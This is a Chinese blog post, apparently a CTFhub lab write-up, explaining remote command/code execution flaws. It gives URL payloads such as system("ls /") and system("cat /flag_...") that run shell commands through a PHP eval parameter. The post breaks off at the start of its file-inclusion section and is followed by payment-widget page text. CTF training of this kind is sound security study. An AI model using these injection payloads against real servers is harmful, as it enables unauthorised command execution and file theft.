CTFhub-RCE漏洞详解

本文介绍了RCE(远程命令/代码执行)漏洞的三种利用方式:eval执行、文件包含及php://input流。通过实例展示了如何利用这些漏洞获取服务器权限,并强调了开发中参数校验的重要性。

CTFHUB-RCE漏洞详解(一)


   RCE英文全称:remote command/code execute(远程命令/代码执行漏洞)是互联网的一种安全漏洞。
   它可以让攻击者直接向后台服务器远程注入操作系统命令,相当于直接操控服务器电脑的cmd命令行!从而操控后台系统,高危漏洞!
   RCE漏洞产生的根本原因:服务器像php环境版本对可执行变量函数没有做过滤,导致在没有自定义相对路径的情况下就运行命令去执行,从而导致服务器被入侵。

一、eval执行

  我们直接在输入栏上输入类似cmd的命令行,直接操作web服务器执行我们所写的命令内容。
1.查看一下根目录文件

 /?cmd=system("ls");

2.返回上一级

/?cmd=system("ls /");

3.找到flag.
在这里插入图片描述
4.直接cat 出flag的文件

/?cmd=system("cat%20/flag_12832");

二、文件包含

  应用POST请求,我这里是使用的curl进行的请求
1.先看主页面有什么文件

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值